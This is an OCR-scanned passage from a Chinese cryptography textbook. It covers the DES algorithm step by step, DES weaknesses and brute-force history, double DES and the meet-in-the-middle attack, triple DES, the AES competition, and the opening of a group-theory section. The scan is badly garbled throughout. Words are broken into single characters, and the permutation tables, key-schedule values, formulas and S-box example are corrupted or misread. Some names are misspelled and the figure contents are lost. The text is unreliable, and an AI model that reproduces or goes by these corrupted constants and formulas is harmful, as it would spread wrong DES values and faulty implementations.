加 密 前 , 先 将 明文 分 成 64 比特 的 分 组 ,然后 将 64 比特 二 
进 制 码 输入 到 密码 器 中 ,密码 器 对 输入 的 64 比特 码 首先 进行 - =- 
初始 置换 IP 

U 


初始 置换 ,然后 在 64 比特 主 密 钥 产生 的 16 个 子 密 钥 控制 下 进 
行 16 轮 乘 积 变换 ,接着 再 进行 逆 初 始 置换 就 得 到 64 比特 已 加 
密 的 密 文 。 

算法 的 主要 步骤 如 图 3-1 所 示 。 

假定 信息 空间 都 是 由 {0,1} 组 成 的 字符 串 ,信息 被 分 成 64 
比特 的 块 , 密 钥 是 56 比特 。 经 过 DES 加 密 的 密 文 也 是 64 比 
特 的 块 。 设 m 是 一 个 64 比特 的 信息 块 ,k 为 56 比特 的 密 
钥 , 即 


在 密 钥 控制 下 16 轮 迭代 


初始 逆 置 换 IP 


输出 64 比 特 密 文 数据 
m=m mme mi=1,2,.,64 3-1 DES 算法 的 主要 步骤 
k=Rkk2"ke Ki 一 1,2,…，64 
其 中 »ks »kis 24 sk3 Rao Rs skse ,ka 是 奇偶 校 验 位 ,真正 起 作用 的 密 钥 仅 56 位 。 
下 面 介绍 一 个 分 组 的 加 密 过 程 。 


1. 初始 置换 IP 


将 64 个 明文 比特 的 位 置 进行 置换 ,得 到 一 个 乱 序 的 64 比特 明文 组 ,然后 分 成 左右 两 
段 , 每 段 为 32 比特 以 工 和 尺 表示 ,如 图 3-2 所 示 。 


2. 迭代 变换 


它 是 DES 算法 的 核心 部 分 。 如 图 3-3 所 示 ,将 经 过 IP 置换 后 的 数据 分 成 32 比特 左右 
两 组 ,在 迭代 过 程 中 彼此 左右 交换 位 置 ,每 次 迭代 只 对 右边 的 32 比特 进行 一 系列 的 加 密 变 
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换 。 在 此 轮 迭 代 即 将 结束 时 ,把 左边 的 32 比特 与 右边 的 32 比特 诸位 模 2 相 加 ,作为 下 一 轮 

办 代 时 右边 的 段 ,并 将 原来 右边 的 未 经 变换 的 段 直接 送 到 左边 的 寄存 器 中 作为 下 一 轮 迭 代 

时 左边 的 段 。 在 每 一 轮 选 代 时 ,右边 段 要 经 过 选择 扩展 运算 下 、 密 钥 加 密 运 算 .选择 压缩 运 

算 S、 置 换 运算 P 和 左右 混合 运算 。 

1，2，3…。 …63，64 
明文 输入 (64 比 特 ) 


5850 42 34 26 18 10 
6052 44 36 28 20 12 


6254 46 38 30 22 14 起 
6456 48 40 32 24 16 置 
5749 41 33 25 17 19 换 


5951 43 35 27 19 11 
6153 45 37 29 21 13 
6355 47 39 31 23 15 


BE ek Le 由 .63 64 


| 置换 后 数据 


12 | 3 


0G2 比 竺 ) Ru32 比 特 ) | 送 至 乘积 变换 的 数据 


ww 一 oem 


图 3-2 初始 置换 


Li1(32 比 特 ) Ri1(32 比 特 ) 


选择 扩展 运算 E 


48 比 特 寄 存 器 


中 -一 子 密 钥 K (48 比特) 


48 比 特 寄存 器 


选择 压缩 运算 E 


32 比 特 寄存 器 
-1 
置换 运算 P 


= 


ZL(32 比 特 ) Ri(32 比 特 ) 
Li=Ri Ri=L; BF(Ri1, K) 


图 3-3 乘积 变换 
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这 样 的 迭代 共 进 行 16 轮 ,结束 后 ,再 将 所 得 的 左右 长 度 相等 的 Les 和 Ri 进行 交换 得 
到 64 比特 数据 。 

1) 选择 扩展 运算 已 

将 输入 的 32 比特 R 扩展 成 48 比特 输出 ,其 变换 表 如 图 3-4 所 示 。 

令 ;表示 EE 的 输入 的 下 标 , 则 已 的 输出 将 是 对 原 下 标 * 一 0 或 1(mod 4) 的 各 比特 重复 
一 次 得 到 的 , 即 对 原 第 32 1458912131617202124252829 各 位 重复 一 次 得 到 数据 扩 
展 。 将 表 中 数据 按 行 读 出 即 得 到 48 比特 输出 。 
1，2,，… 32 

的 输入 (32 比特 ) 


忆 
己 
D 
四 
B 
S 
we 二 二 
SBPFSaw» 
Ne 
SS 
著 斌 油 沁 其 嵌 


选择 扩展 运算 结果 (48 比 特 ) 
1 2 “48 


图 3-4 选择 扩展 运算 EE 


2) 密 钥 加 密 运 算 

将 子 密 钥 产生 器 输出 的 48 比特 子 密 钥 与 选择 扩展 运算 EE 输出 的 48 比特 数据 按 位 模 
2 相 加 ( 子 密 钥 如 何 产生 请 见 后 文 ) 。 

3) 选择 压缩 运算 S 

将 前 面 送 来 的 48 比特 数据 自 左 至 右 分 成 8 组 ,每 组 6 比特 。 然 后 并 行 送 入 8 个 S 盒 ， 
每 个 S 盒 为 一 非 线 性 代 换 网 络 , 有 4 个 输出 。 盒 Si 至 Ss 的 选择 函数 关系 如 表 3-1 所 示 , 运 
算 S 的 框图 如 图 3-5 所 示 。 

8 个 S 盒 是 将 6 比特 的 输入 映射 为 4 比特 的 输出 。 

以 S 盒 为 例 说 明 它 们 的 功能 如 下 : 

若 输入 为 016263b4bsbs 其 中 bb 两 位 二 进 制 数 表达 了 0 一 3 之 间 的 数 。 饭 名 465 为 四 位 
二 进 制 数 ,表达 0 一 15 之 间 的 某 个 数 。 

在 Si 表 中 的 bbs 行 bsbsb4bs 列 找到 一 数 m (0 三 mm 三 15), 若 用 二 进 制 表示 为 
77217722 7723 7774 , 则 777177227723 7774 便 是 它 的 4 比特 输出 o 

例如 输入 为 001111,616s 二 01 二 1,6bs63b4bs 一 0111 二 7, 即 在 Si 盒 中 的 第 1 行 第 7 列 求 
得 数 1, 所 以 它 的 4 比特 输出 为 0001。 

又 如 对 于 S; 盒 输入 为 101011, 则 S; 盒 中 3 行 5 列 元 素 为 15, 故 输出 为 1111。 
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表 3-1 DES 的 S 盒 定义 
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存 器 


特 寄 


48 比 特 寄存 器 
Ss 


32 比 : 


图 3-5 S 使 的 结构 
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S 盒 是 DES 的 核心 ,也 是 DES 算法 最 敏感 的 部 分 ,其 设计 原理 至 今 仍 讳 莫如 深 ,显得 
非常 神秘 。 所 有 的 替换 都 是 固定 的 ,但 是 又 没有 明显 的 理由 说 明 为 什么 要 这 样 ,有 许多 密码 
学 家 担心 美国 国家 安全 局 设计 S 盒 时 隐藏 了 某 些 陷 门 ,使 得 只 有 他 们 才 可 以 破译 算法 ,但 
研究 中 并 没有 找到 弱点 。 

美国 国家 安全 局 曾 透露 了 S 盒 的 几 条 设计 准则 : 

(1) 所 有 的 S 盒 都 不 是 它 输入 的 线性 仿 射 函数 , 换 句 话说 ,就 是 没有 一 个 线性 方程 能 将 
四 个 输出 比特 表示 成 6 个 比特 输入 的 函数 。 

(2) 改变 S 盒 的 1 位 输入 ,输出 至 少 改 变 2 位 ,这 意味 着 S 盒 是 经 过 精心 设计 的 , 它 最 
大 程度 上 增 大 了 扩散 量 。 

(3) S 盒 的 任意 一 位 输出 保持 不 变 时 0 和 1 个 数 之 差 极 小 , 即 如 果 保 持 一 位 不 变 而 改 
变 其 他 五 位 ,那么 其 输出 0 和 1 的 个 数 不 应 相差 太 多 。 

4) 置换 运算 

置换 运算 已 对 S, 至 Ss 盒 输出 的 32 比特 数据 进行 坐标 变换 ,如 图 3-6 所 示 , 置 换 忆 输 
出 的 32 比特 数据 与 左边 32 比特 即 R;_1 诸 位 模 2 相 加 所 得 到 的 32 比特 作为 下 一 轮 选 代用 
的 右边 的 数字 段 ,并 将 Ri-! 并 行 送 到 左边 的 寄存 器 作为 下 一 轮 迭 代用 的 左边 的 数字 有 段 。 


3. 子 密 钥 产生 器 


将 64 比特 初始 密 钥 经 过 置换 选择 PC-1 ,循环 移 位 置换 .置换 选择 PC-2, 给 出 每 次 迭代 
加 密 用 的 子 密 钥 &; ,如 图 3-7 所 示 。 


密 钥 (64 比 特 ) 
除去 第 8，16,…，64 位 ， 共 8 个 校 验 位 


选择 函数 输出 (32 比 特 ) 置换 选择 1(PC-1) 

16 7 20 21 | Ci(28 比 特 ) D;(28 比 特 ) 
29 12 28 17 

1 15 23 26 

: - 入 [和 在 区 or 位 循环 左 移 /位 
32 27 3 9 

19 13 30 6 

22 11 4 25 | 置换 选择 2(PC-2) | 

| 

加 密 函 数 的 结果 和 (48 比特 ) 
图 3-6 置换 运算 P 图 3-7 子 密 铀 产生 器 


在 64 比特 初始 密 钥 中 有 8 位 为 校 验 位 ,其 位 置 号 为 8 16 24 32 48 56 和 64, 其 余 56 位 
用 于 子 密 钥 计算 ,将 这 56 位 送 入 置换 选择 PC-1。 置 换 后 分 为 两 组 ,每 组 为 28 比特 ,分 别 送 
入 CC 寄存 器 和 D 寄存 器 中 ,如 图 3-8 所 示 。 
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密 钥 (64 比 特 ) 


57 49 41 33 25 17 9 63 55 47 39 31 23 15 
1 58 50 42 34 26 18 7 62 54 46 38 30 22 
10 259 51 43 35 27 14 661 53 45 37 29 
19 11 3 60 52 44 36 21 13 5 28 20 12 4 


图 3-8 置换 选择 PC-1 
在 各 次 迭代 中 C 和 DD 寄存 器 分 别 将 存 数 进行 左 循环 移 位 置换 , 移 位 次 数 如 表 3-2 所 
示 。 每 次 移 位 后 将 C 和 寄存 器 的 存 数 送 给 置换 选择 PC-2。 
表 3-2 移 位 次 数 表 


第 ;次 丰 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 
循环 左 移 次 数 1 1 2 2 2 2 2 2 1 2 2 ;2 2 2 2 1 


置换 选择 PC-2 将 C 中 第 918 22 25 位 和 DD 中 第 79 15 26 位 删 去 ,并 将 其 余数 字 置 换 
位 置 后 送出 48 比特 数字 作为 第 i 次 迭代 时 所 用 的 子 密 钥 &;, 如 图 3-9 所 示 。 


cEstt$i) | Dstt 和 i) | 


U 


(48 比 特 ) 


图 3-9 置换 选择 PC-2 


例如 ,一 局 有 Rs ， 则 Co 二 ksr kso*…*kas ks Co 一 人 3R55 Ri 有 。 

下 面 介绍 如 何 从 C;、D, 求 Ch 、 Di 一 0,1,2,…,15。 

设 Ci 二 cco…czs ,Di 一 dd…dzs。 首 先 要 做 左 移 运算 , 左 移 的 位 数 如 表 3-2 所 示 。 例 
如 , 设 C = 一 cice…czs ,Di 二 did2…dzs, 则 C: 一 czcs…czs clyD: 一 dzd3*…dzs di1。 

C; 和 Ds 是 由 Cs 、D; 左 移 1 位 而 得 到 的 ,C, 和 D, 是 由 C3、D; 左 移 2 位 而 得 到 的 ,所 
以 C4 王 csce…caa cl cz cs cDs= dide…dzs di d; ds ds。 

因此 ,C; Di 一 bb2*…bse : 则 ki 二 bi bir bi boa***bss pos pas 。 
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4. 逆 初 始 置换 IP- 


将 16 轮 迁 代 后 给 出 的 64 比特 组 进行 置换 得 到 输出 的 密 文 组 ,如 图 3-10 所 示 ,输出 为 
阵 中 元 素 按 行 读 的 结果 。 注 意 IP 中 的 第 58 位 正好 是 1, 也 就 是 说 在 IP 的 置换 下 第 58 位 换 
为 第 1 位 。 同 样 ,在 IP 的 置换 下 应 将 第 1 位 换 回 第 58 位 , 依 此 类 推 ,由 此 可 见 输入 组 m 和 
IP-:(IP(z)) 是 一 样 的 ,IP 和 IP7! 在 密码 上 的 意义 不 大 , 它 的 作用 在 于 打 乱 原来 输入 m 的 
ASCII 码 字 划 分 关系 。 


置换 码 组 (64 比 特 ) 


| 


42 10 50 18 58 26 
41 9 49 17 57 25 


| 


密 文 (64 比 特 ) 
ly ros 64 


图 3-10 逆 初 始 置换 IP 


40 8 48 16 56 24 64 32 逆 
39 7 47 15 55 23 63 3l 初 
38 6 46 14 54 22 62 30 让 
37 5 45 13 53 21 6 29 换 
36 4 4 12 52 20 60 28 
35 3 43 1 51 1 5 27 

2 

1 


逆 初 始 置换 后 得 到 的 64 位 数据 分 组 , 即 为 加 密 后 得 到 的 密 文 。 
5. DES 的 解密 


解密 算法 与 加 密 算法 相同 ,只 是 子 密 钥 的 使 用 次 序 相 反 。 把 64 位 密 文 当做 输入 ,第 一 
次 解密 迭代 使 用 子 密 钥 ki ,第 二 次 解密 迭代 使 用 子 密 钥 ks ,第 16 次 解密 迭代 使 用 子 密 钥 
,最 后 的 输出 便 是 64 位 的 明文 。 


323 DES 的 安全 性 


DES 的 出 现 是 密码 学 史上 的 一 个 创举 ,以 前 任何 设计 者 对 于 密码 体制 及 其 设计 细节 都 
是 严 加 保密 的 。 而 DES 公开 发 表 , 任 人 研究 和 分 析 。 无 须 经 过 许可 就 可 以 制作 DES 的 芯 
片 和 以 DES 为 基础 的 保密 设备 。DES 的 安全 性 完全 依赖 于 所 用 的 密 钥 。DES 在 20 多 年 
的 应 用 实践 中 ,没有 发 现 严重 的 安全 缺陷 ,在 世界 范围 内 得 到 了 广泛 的 应 用 ,为 确保 信息 安 
全 做 出 了 不 可 磨灭 的 贡献 。 

然而 ,出 于 安全 方面 的 考虑 ,在 DES 被 采纳 为 标准 之 前 , 曾 受 到 过 激烈 的 批评 ,其 实 直 
到 今天 都 未 平息 。 批 评 主要 集中 在 两 个 方面 。 其 一 ,DES 的 前 身 是 IBM 公司 的 LUCIFER 
算法 ,该 算法 采用 的 密 钥 长 度 是 128 位 ,而 DES 却 只 使 用 了 56 位 的 密 钥 ,减少 了 72 位 。 批 
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评 者 担心 密 钥 太 短 而 无 法 抗击 穷 举 攻击 。 其 二 ,DES 的 内 部 结构 , 即 S 盒 的 设计 标准 被 列 
入 官方 机 密 。 所 以 ,用 户 不 能 确信 DES 的 内 部 结构 是 没有 弱点 的 ,美国 国家 安全 局 (NSA) 
有 可 能 利用 这 些 弱 点 在 没有 密 钥 的 情况 下 来 解密 。 不 过 近年 来 的 差分 分 析 方面 的 研究 表 
明 ,DES 的 内 部 结构 是 强健 的 。 而 且 按 照 IBM 的 参与 者 所 说 ,原始 算法 中 唯一 做 过 改动 的 
就 是 S 盒 ,这 是 由 NSA 建议 的 , 它 去 掉 了 测试 过 程 中 发 现 的 一 些 算法 脆弱 性 。 

自从 DES 问世 至 今 已 经 有 近 30 年 了 ,尽管 一 开始 人 们 就 对 它 有 颇 多 的 担心 和 争议 ,这 
些 年 来 许 许 多 多 的 人 对 它 进行 各 种 各 样 的 研究 攻击 。 从 目前 的 成 果 来 看 ,除了 穷 举 攻击 之 
外 ,就 没有 更 好 的 方法 破译 DES 了 。 

从 应 用 实践 来 看 ,DES 具有 良好 的 “雪崩 效 应 ”*。 所 谓 雪 崩 效 应 ,就 是 明文 或 密 钥 的 微 
小 改变 将 对 密 文 产生 很 大 的 影响 。 特 别 地 ,明文 或 密 钥 的 某 一 位 发 生变 化 ,会 导致 密 文 的 很 
多 位 发 生变 化 。 

DES 显示 了 很 强 的 雪崩 效应 ,例如 通过 实验 可 以 发 现 ,两 条 仅 有 一 位 不 同 的 明文 ,使 用 
相同 的 密 钥 , 仅 经 过 3 轮 迭 代 , 所 得 两 段 准 密 文 就 有 21 位 不 同 ; 一 条 明文 ,使 用 两 个 仅 一 位 
不 同 的 密 钥 加 密 , 经 过 数 轮 变换 之 后 ,有 半数 的 位 都 不 相同 。 
当然 ,DES 也 存在 着 一 些 有 可 能 被 利用 的 弱点 ,如 : 

(1) 密 钥 较 短 : 56 位 密 钥 空间 约 为 7.2X10”。1997 年 6 月 Rocke Verser 小 组 通过 因 
特 网 利用 数 万 台 微 机 历时 4 个 月 破译 了 DES; 1998 年 7 月 ,EFF 用 一 台 25 万 美元 的 机 器 ， 
历时 56 小 时 破译 了 DES。 

(2) 存在 弱 密 钥 : 有 的 密 钥 产 生 的 16 个 子 密 钥 中 有 重复 者 。 

(3) 互补 对 称 性 : C=DES(M,K), 则 C' 二 DES(M',K')。 其 中 ,M',C',K' 是 M,C,K 
的 非 。 

20 多 年 来 对 DES 进行 的 大 量 研究 ,主要 成 果 集 中 在 以 下 几 个 方面 。 


1. 弱 密 钥 


DES 算法 在 每 次 迭代 时 都 有 一 个 子 密 钥 供 加 密 用 ,如 果 一 个 外 部 密 钥 所 产生 的 所 有 子 
密 钥 都 是 一 样 的 , 则 这 个 密 钥 就 称 为 弱 密 钥 (weak key) 。 
若 上 为 弱 密 钥 , 则 有 


DES, (DES,(x))= 7x 
DES (DESi'(x)) = zx 
即 以 & 对 xz 加 密 或 解密 两 次 都 可 以 恢复 出 明文 ,其 加 密 运 算 和 解密 运算 没有 区 别 。 
如 果 随 机 选取 密 钥 ,在 总 数 2 个 密 钥 中 , 弱 密 钥 所 占 比例 很 小 ,加 以 注意 就 可 以 避 开 ， 
对 DES 的 安全 性 影响 不 大 。 


2. 密 文 与 明文 、 密 文 与 密 钥 的 相关 性 


有 人 详细 研究 了 DES 的 输入 ,表明 每 个 密 文 比特 都 是 所 有 明文 比特 和 所 有 密 钥 比 特 的 
复合 函数 ,并 且 指 出 达到 这 一 要 求 所 需 的 迭代 次 数 最 少 为 5, 迭 代 8 次 以 后 输出 和 输入 就 可 
认为 是 不 相关 的 了 。 


3. 密 钥 搜 索 机 
对 DES 的 安全 性 的 意见 中 ,较为 一 致 的 看 法 是 DES 的 密 钥 短 了 些 , 密 钥 长 度 是 56 比 
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特 , 密 钥 量 为 2*7. 2X10"* 个 ,选择 长 密 钥 时 会 使 成 本 提高 ,运行 速度 降低 ,车 要 对 DES 进 
行 密 钥 搜索 破译 ,分 析 者 在 得 到 一 组 明文 - 密 文 对 的 情况 下 ,可 对 明文 进行 不 同 的 密 钥 加 密 ， 
直到 得 到 的 密 文 与 已 知 的 密 文 -明文 对 中 的 相符 就 可 确定 所 用 的 密 钥 了 。 

1977 年 Differ 和 Hellman 认为 利用 100 万 个 超大 规模 集成 电路 块 所 组 成 的 一 台 专 门 
用 于 破译 DES 的 并 行 计算 机 能 在 一 天 中 穷 举 搜索 所 有 2” 个 密 钥 , 每 个 集成 块 每 微 秒 检查 
一 个 密 钥 , 则 每 天 可 以 检查 8. 64X10" 个 密 钥 。 如 果 用 一 个 集成 块 检查 全 部 密 钥 , 则 几乎 要 
花费 8.33X105 天 , 约 2283 年 。 

但 是 如 果 用 100 万 个 集成 块 , 则 在 一 天 时 间 内 可 以 检查 整个 密 钥 空 间 。 这 样 一 台 机 器 
在 1977 年 需 耗资 约 2000 万 美元 。Differ 和 Hellman 据 此 指出 ,除了 像 美 国 国家 安全 局 那 
样 的 机 构 外 ,任何 人 不 可 能 破译 DES。 但 他 们 预测 到 1990 年 制造 和 破译 DES 专用 机 的 成 
本 将 要 大 幅度 下 降 , 那 时 DES 将 完全 是 不 安全 的 。 

事实 证 明 ,他 们 的 预测 是 有 道理 的 ,在 过 去 相当 长 的 一 段 时 间 里 ,人 们 找 不 到 比 穷 举 搜 
索 更 有 效 的 方法 攻击 DES。 也 没有 能 力 对 56 比特 的 密 钥 进行 穷 举 搜索 ,因而 在 过 去 ,DES 
是 安全 的 ,但 目前 的 事实 证 明 这 个 历史 已 成 为 过 去 ,DES 不 能 经 受 住 穷 举 攻击 。 
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DES 在 穷 举 攻击 下 相对 比较 脆弱 ,因此 需要 用 某 种 算法 来 蔡 代 它 , 有 两 种 解决 方法 。 
其 一 ,设计 全 新 的 算法 ; 其 二 ,用 DES 进行 多 次 加 密 , 且 使 用 多 个 密 钥 , 即 多 重 DES。 这 种 
方法 能 够 保护 用 于 DES 加 密 的 已 有 软件 和 硬件 继续 使 用 。 


1. 二 重 DES 


二 重 DES 的 加 密 与 解密 过 程 如 图 3-11 所 示 。 给 定 明文 P 和 两 个 加 密 密 钥 &， 和 , 采 
用 DES 对 已 进行 加 密 已 ,有 
密 文 C= Ee(CEu(P)) 
对 C 进行 解密 DD ,有 
明文 P= Du (Di (C)) 
显然 ,二 重 DES 比 单一 的 DES 要 安全 ,因为 这 里 使 用 了 两 个 密 钥 ( 均 为 56 比特 ), 设 
k 二 ks, 则 的 密 钥 空间 数量 为 2 。 
. | | | 
?一 二- = -ec cn Ho Hr 
(a) 加 密 (b) 解密 


3-11 二 重 DES 


这 里 要 注意 ,如 果 采 用 普通 穷 举 法 来 攻击 二 重 DES, 其 攻击 代价 并 不 是 2”。 这 是 因为 
一 个 分 组 为 64 比特 ,明文 空间 为 2” ,而 密 钥 空间 为 2*。 因 此 对 于 某 个 明文 P, 可 产生 密 文 
C 的 密 钥 平均 个 数 为 2”/2” 二 2s 个 。 换 旬 话 说 ,大 约 有 2” 个 不 同 的 密 钥 ,对 明文 P 加 密 后 
得 到 的 密 文 相同 且 都 等 于 C。 这 就 需要 另 一 个 (P,C) 对 ,以 从 这 2” 个 不 同 的 密 钥 中 确定 真 
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正 的 密 钥 。 因 此 总 的 计算 代价 为 2* 十 2%。 

但 是 ,如 果 采 用 * 中 间 相 遇 攻 击 ”(meet-in-the-middle attack) 来 攻击 二 重 DES, 则 可 以 
大 大 减少 攻击 代价 。 

从 图 3-11 可 以 看 出 : X 王 Eu (CP) 一 Do(C) 。 

车 给 出 一 个 已 知 的 明 - 密 文 对 (P,C) ,分 别 用 2 个 所 有 密 钥 久 对 明文 P 进行 加 密 , 得 
到 一 张 密 钥 对 应 于 密 文 X 的 表 ; 类 似 地 ,对 2” 个 所 有 可 能 的 密 钥 k, 对 密 文 C 进行 解密 ,得 
到 相应 的 “明文 *X, 做 成 一 张 X 与 As 的 对 应 表 。 比 较 两 个 表 中 X 相同 的 项 ,就 会 得 到 真正 
使 用 的 密 钥 对 已 ,es 。 可 以 看 出 ,计算 代价 为 2* 十 2 二 2 。 


2. 三 重 DES 


对 付 中 间 相 遇 攻 击 的 一 个 有 效 的 方法 是 使 用 三 重 DES。 
1) 使 用 两 个 密 钥 的 三 重 DES 
Tuchman 建议 仅 使 用 两 个 密 钥 进行 三 次 加 密 , 并 给 出 了 双 密 钥 的 EDE 模式 (加 密 - 解 
密 - 加 密 ) ,如 图 3-12 所 示 。 
C= Eua(CDe(CEna(CP))) …… 对 P 了 加 密 
P == Da (Ew (Da(C))) …… 对 C 解 密 


(a) 加 密 


图 3-12 使 用 两 个 密 钥 的 三 重 DES 


其 中 ,E 为 加 密 运算 ,D 为 解密 运算 。 

这 种 替代 DES 的 加 密 较为 流行 并 且 已 被 采纳 用 于 密 钥 管理 标准 (The Key Manager 
Standards ANSX9. 17 和 ISO8732)。 到 目前 为 止 ,还 没有 人 给 出 对 上 述 三 重 DES 的 有 效 攻 
击 方法 。 对 其 密 钥 空 间 中 密 钥 进行 穷 举 搜索 ,由 于 空间 太 大 (为 2” 一 5X10”), 这 实际 上 是 
不 可 行 的 。 

Merkle 和 Hellman 设法 创造 一 个 条 件 , 想 把 中 间 相 遇 攻 击 的 方法 用 于 三 重 DES, 但 目 
前 也 不 太 成 功 。 

2) 使 用 三 个 密 钥 的 三 重 DES 

虽然 对 上 述 带 双 密 钥 的 三 重 DES 到 目前 为 止 还 没有 好 的 实际 攻击 办 法 ,但 人 们 还 是 放 
心 不 下 ,又 建议 使 用 三 密 钥 的 三 重 DES, 此 时 密 钥 总 长 为 168 比特 。 加 解密 过 程 如 图 3-13 


四 


VN ee 2 = | CT jp | lA BE 


(a) 加 密 (b) 解密 
图 3-13 使 用 三 个 密 钥 的 三 重 DES 
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加 密 : C = Es (Di (En (P))) 
解密 : P = Da (Es (Dis (P))) 
在 实际 应 用 中 ,应 根据 具体 安全 需求 来 确定 到 底 是 使 用 两 个 密 钥 还 是 三 个 密 钥 的 三 重 
DES, 因 为 安全 性 能 越 高 , 则 付出 的 计算 代价 和 密 钥 管理 成 本 也 越 高 。 
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3DES 的 根本 缺点 在 于 用 软件 实现 该 算法 的 速度 比较 慢 。 起 初 ,DES 是 为 20 世纪 70 
年 代 中 期 的 硬件 实现 设计 的 ,难以 用 软件 有 效 地 实现 该 算法 。 在 3DES 中 轮 的 数量 是 DES 
的 三 倍 , 所 以 其 速度 比 DES 要 慢 得 多 。 另 一 个 缺点 是 DES 和 3DES 的 分 组 长 度 均 为 64 位 ， 
从 运算 效率 和 安全 性 考虑 ,分 组 长 度 应 该 更 大 。 由 于 这 些 原因 ,DES 和 3DES 不 可 能 长 期 
成 为 加 密 算法 标准 。 

因此 ,1997 年 1 月 ,美国 国家 标准 局 NIST 向 全 世界 密码 学 界 发 出 征集 21 世纪 高 级 加 
密 标准 (Advanced Encryption Standard,AES) 算 法 的 公告 ,要求 AES 的 安全 性 能 不 能 低 于 
3DES, 同 时 应 具有 更 好 的 执行 性 能 。 除 了 这 些 通 常 的 要 求 之 外 ,NIST 特别 提出 了 AES 必 
须 是 分 组 长 度 为 128 位 的 对 称 分 组 密码 ,并 能 支持 长 度 为 128 位 、192 位 和 256 位 的 密 钥 。 
对 AES 候选 算法 进行 评估 筛选 时 主要 考虑 以 下 三 个 方面 

(1) 安全 性 : 指 用 密码 分 析 方法 分 析 一 个 算法 的 代价 。 评 估 的 重点 在 于 能 否 防止 实际 
的 攻击 。AES 要 求 最 短 密 钥 长 度 为 128 位 , 故 使 用 目前 技术 的 穷 举 攻击 方式 是 不 可 行 的 。 

(2) 成 本 : NIST 希望 AES 能 够 广泛 地 应 用 于 各 种 实际 应 用 ,所 以 AES 必须 具有 很 高 
的 计算 效率 ,以 便 其 能 用 于 各 种 高 速 应 用 。 

(3) 算法 和 执行 特征 : 它 包 含 了 各 方面 需要 关注 的 事项 ,如 算法 灵活 人 性、 算法 适合 于 多 
种 硬件 和 软件 方式 实现 ,算法 的 简洁 性 ,以 便于 分 析 算 法 的 安全 性 。 

1998 年 4 月 15 日 全 面 征集 AES 算法 的 工作 结束 。1998 年 8 月 20 日 举行 了 首届 AES 
讨论 会 ,对 涉及 14 个 国家 的 密码 学 家 所 提出 的 候选 AES 算法 进行 了 评估 和 测试 , 初 选 并 公 
布 了 15 个 被 选 方案 , 供 大 家 公开 讨论 。 这 些 算法 是 


CAST-256 RC-6 CRYPTON-128 DEAL-128 FROG 
DFC LOKI-97 MAGENTA MARS HPC 
RIJINDAEL SAFER 十 SERPENT E-2 TWOFISH 


这 些 算法 设计 思想 新 颖 ,技术 水 平 先进 ,算法 的 强度 都 超过 3-DES, 实现 速度 快 
于 3DES。 

1999 年 8 月 9 日 NIST 宣 布 第 二 轮 筛 选 出 的 5 个 候选 算法 为 : 

MARS(C. Burwick 等 ,IBM); 

RC6TM(R. Rivest 等 ,RSA Lab); 

RIJNDAEL(J. Daemen, 比 ); 

SERPENT(R. Anderson 等 , 英 、 以 ,挪威 ); 

TWOFISH(B. Schiener) 。 
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2000 年 10 月 2 日 ,NIST 正式 宣布 将 RIJNDAEL 作为 AES 标准 的 加 密 算法 ,以 下 是 
NIST 对 RJNDAEL 算法 的 最 终 评估 结果 。 

(1) 一 般 安全 性 : 没有 已 知 的 攻击 方法 能 攻击 RUJNDAEL。 它 以 S 盒 作 为 非 线性 组 
件 , 表 现 出 了 足够 的 安全 性 能 。 

(2) 软件 执行 : RUNDAEL 非常 利于 在 包括 8 位 和 64 位 以 及 DSP 在 内 的 各 种 平台 上 
执行 的 加 密 和 解密 算法 。RIJNDAEL 固有 的 分 布 执行 机 制 能 够 充分 有 效 地 利用 处 理 器 资 
源 ,甚至 在 不 能 分 布 执行 的 模型 下 仍 能 达到 非常 好 的 软件 执行 性 能 。 同 时 ,RUJNDAEL 的 
密 钥 安装 速度 非常 快 。 

(3) 受 限 空间 环境 : RUNDAEL 非常 适合 在 受 限 空间 环境 中 执行 加 密 或 解密 操作 , 它 
对 RAM 和 ROM 的 要 求 很 低 。 在 这 样 的 环境 中 ,如 果 既 要 执行 加 密 操作 又 要 执行 解密 操 
作 , 则 其 缺陷 是 它 需要 更 大 的 ROM 空间 ,因为 加 密 和 解密 的 主要 步骤 是 不 同 的 。 

(4) 硬件 执行 : 在 最 后 的 五 个 候选 算法 中 ,RIJNDAEL 在 反馈 模型 下 执行 的 速度 最 快 ， 
在 非 反馈 模型 下 的 执行 速度 位 居 第 二 。 但 当 该 算法 的 密 钥 长 度 为 192 位 和 256 位 时 , 因 执 
行 的 轮 数 增加 ,其 执行 速度 变 慢 。 当 用 完全 的 流水 线 实现 时 ,该 算法 需要 更 多 的 存储 空间 ， 
但 不 影响 其 执行 速度 。 

(5) 对 执行 的 攻击 : RJNDAEL 所 采用 的 实现 方式 非常 利于 防止 能 量 攻击 和 计时 攻 
击 。 与 其 他 候选 算法 相 比 ,RUNDAEL 算法 利用 掩 码 技术 使 其 具有 防止 这 些 攻击 的 能 力 ， 
并 未 显著 降低 该 算法 的 执行 性 能 。 同 时 , 它 对 RAM 的 需求 仍 在 合理 的 范围 内 。 当 使 用 这 
些 攻击 措施 时 ,RIJNDAEL 比 其 他 的 候选 算法 在 执行 速度 上 更 有 优势 。 

(6) 加 密 与 解密 : RUNDAEL 的 加 密 函 数 和 解密 函数 不 同 。 尽 管 在 解密 算法 中 密 钥 安 
装 速度 比 在 加 密 算法 中 速度 要 慢 , 但 RUNDAEL 执行 加 密 和 解密 算法 的 速度 差不多 。 

(7) 密 钥 灵活 性 : RUNDAEL 支持 加 密 中 的 快速 子 密 钥 计 算 。RIJNDAEL 要 求 在 加 
密 前 用 特定 密 钥 产生 子 密 钥 , 这 给 RIJNDAEL 的 密 钥 灵活 性 稍微 增加 了 一 点 资源 负担 。 

(8) 其 他 的 多 功能 性 和 灵活 性 : RUNDAEL 支持 分 组 和 密 钥 长 度 分 别 为 128 位 、192 
位 和 256 位 的 各 种 组 合 。 原 则 上 ,RIJNDAEL 算法 结构 能 通过 改变 轮 数 来 支持 任意 长 度 为 
32 的 倍数 的 分 组 和 密 钥 长 度 。 

(9) 指令 级 并 行 执行 潜力 : RUNDAEL 对 于 单个 分 组 加 密 有 很 好 的 并 行 执行 能 力 。 
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1. 群 


群 是 一 个 代数 系统 , 它 由 一 个 非 空 集 合 G 组 成 ,在 集合 G 上 定义 了 一 个 二 元 运算 ,其 
满足 : 

(1) 封闭 性 , 即 对 任意 的 a,bEG,a* bEG。 

(2) 结合 律 , 即 对 任何 的 a,6b,cEG, 有 a*b*c=(a*b)*c=a*(b*c)。 

(3) 单位 元 , 即 存在 一 个 元 素 1€G( 称 为 单位 元 ), 对 任意 元 素 a€G 有 : a*1=1，* 


a 
| 
a 


